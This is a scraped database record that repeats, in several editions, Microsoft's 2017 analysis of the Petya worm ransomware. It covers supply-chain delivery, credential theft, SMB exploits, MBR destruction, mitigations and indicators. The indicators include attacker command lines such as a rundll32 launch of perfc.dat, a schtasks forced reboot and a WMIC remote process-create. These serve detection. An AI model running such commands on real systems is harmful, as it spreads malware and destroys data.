(UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File Indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command Lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;\n * cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * \u201cprocess call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\u201d\n\nNetwork indicators\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "lastseen": "2017-06-30T15:02:19", "modified": "2017-06-28T06:57:43", "objectVersion": "1.4", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 4}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-06-30T15:02:19"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute a copy on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "lastseen": "2017-07-14T04:03:11", "modified": "2017-06-28T06:57:43", "objectVersion": "1.4", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 6}, "differentElements": ["description"], "edition": 3, "lastseen": "2017-07-14T04:03:11"}], "modified": "2017-06-28T06:57:43", "lastseen": "2017-09-15T09:08:41", "published": "2017-06-28T06:57:43", "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to 